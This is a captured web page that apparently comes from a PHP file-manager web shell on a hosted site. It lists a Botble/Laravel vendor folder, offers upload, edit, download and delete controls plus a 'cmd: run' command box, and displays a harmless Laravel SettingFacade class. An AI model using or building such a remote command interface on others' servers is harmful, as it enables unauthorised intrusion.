/
home
/
techb158
/
immovalet.com
/
vendor
/
botble
/
platform
/
setting
/
src
/
Facades
/
/home/techb158/immovalet.com/vendor/botble/platform/setting/src/Facades
mkdir
upload
Name
Size
Mode
Actions
SettingFacade.php
355
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/botble/platform/setting/src/Facades/SettingFacade.php
(355B)
<?php namespace Botble\Setting\Facades; use Botble\Setting\Supports\SettingStore; use Illuminate\Support\Facades\Facade; class SettingFacade extends Facade { /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return SettingStore::class; } }
Save
cmd:
run